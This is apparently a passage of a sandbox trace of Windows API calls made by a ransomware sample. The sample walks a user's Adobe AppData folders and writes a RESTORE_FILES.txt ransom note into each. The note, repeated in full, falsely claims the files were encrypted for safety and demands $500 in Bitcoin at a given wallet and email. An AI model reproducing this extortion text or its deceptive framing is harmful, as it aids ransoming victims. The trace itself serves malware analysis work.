\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.676] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.677] lstrlenA (lpString="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") returned 684 [0089.677] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.677] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.677] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.677] CloseHandle (hObject=0x150) returned 1 [0089.677] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.677] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.677] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\RESTORE_FILES.txt") returned 97 [0089.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.678] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.678] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.679] lstrlenA (lpString="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") returned 684 [0089.679] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.679] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.679] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.679] CloseHandle (hObject=0x14c) returned 1 [0089.685] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.685] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.685] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\RESTORE_FILES.txt") returned 86 [0089.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.691] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.692] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.692] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.692] CloseHandle (hObject=0xd8) returned 1 [0089.692] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="Windows") returned -1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="Program Files") returned -1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="Program Files (x86)") returned -1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="$Recycle.bin") returned 1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="System Volume Information") returned -1 [0089.692] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights") returned 66 [0089.692] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0089.692] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned 68 [0089.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.693] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0089.693] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.693] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.693] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.693] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\.") returned 68 [0089.693] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.693] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.693] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.693] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.693] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.693] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.693] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\..") returned 69 [0089.693] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.693] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.693] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.693] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\RESTORE_FILES.txt") returned 84 [0089.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.694] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.694] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.695] lstrlenA 
(lpString="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") returned 684 [0089.695] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.695] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.695] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.695] CloseHandle (hObject=0xd8) returned 1 [0089.695] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="Windows") returned -1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files") returned -1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files (x86)") returned -1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="$Recycle.bin") returned 1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="System Volume Information") returned -1 [0089.695] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics") returned 67 [0089.695] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0089.695] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0089.695] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned 69 [0089.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.695] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.695] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.695] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.695] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.695] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.695] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\.") returned 69 [0089.695] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.695] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\..") returned 70 [0089.696] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.696] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.696] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW 
(lpString1="Dictionaries", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned 80 [0089.696] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0089.696] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0089.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned 82 [0089.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.696] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\.") returned 82 [0089.696] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.696] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 
[0089.696] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\..") returned 83 [0089.696] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.696] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.697] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.697] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.697] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt") returned 98 [0089.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.699] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.699] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.700] lstrlenA (lpString="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") returned 684 [0089.700] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.700] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.700] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.700] CloseHandle (hObject=0x14c) returned 1 [0089.700] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.700] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.700] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\RESTORE_FILES.txt") returned 85 [0089.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.701] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.701] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.705] lstrlenA (lpString="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") returned 684 [0089.705] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.705] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.705] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 